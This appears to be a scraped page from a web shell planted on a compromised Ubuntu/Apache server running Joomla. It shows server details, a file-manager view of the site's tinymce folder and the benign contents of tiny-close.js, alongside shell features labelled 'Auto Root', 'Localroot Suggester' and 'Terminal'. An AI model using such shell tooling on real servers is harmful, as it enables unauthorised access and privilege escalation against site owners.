Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
teste /
media /
editors /
tinymce /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
plugins
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
tiny-close.js
1.21
KB
-rw-r--r--
2017-10-04 08:52
tiny-close.min.js
692
B
-rw-r--r--
2017-10-04 08:52
tinymce-builder.js
10.13
KB
-rw-r--r--
2017-10-04 08:52
tinymce.js
4.08
KB
-rw-r--r--
2017-10-04 08:52
tinymce.min.js
2.42
KB
-rw-r--r--
2017-10-04 08:52
Save
Rename
/** * @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * This is used by tinyMCE in order to allow both mootools and bootstrap modals * to close correctly, more tinyMCE related functionality maybe added in the future * * @package Joomla * @since 3.5.1 * @version 1.0 */ document.addEventListener('DOMContentLoaded', function () { if (typeof window.jModalClose_no_tinyMCE === 'undefined') { window.jModalClose_no_tinyMCE = typeof(jModalClose) == 'function' ? jModalClose : false; jModalClose = function () { if (window.jModalClose_no_tinyMCE) window.jModalClose_no_tinyMCE.apply(this, arguments); tinyMCE.activeEditor.windowManager.close(); }; } if (typeof window.SqueezeBoxClose_no_tinyMCE === 'undefined') { if (typeof(SqueezeBox) == 'undefined') SqueezeBox = {}; window.SqueezeBoxClose_no_tinyMCE = typeof(SqueezeBox.close) == 'function' ? SqueezeBox.close : false; SqueezeBox.close = function () { if (window.SqueezeBoxClose_no_tinyMCE) window.SqueezeBoxClose_no_tinyMCE.apply(this, arguments); tinyMCE.activeEditor.windowManager.close(); }; } });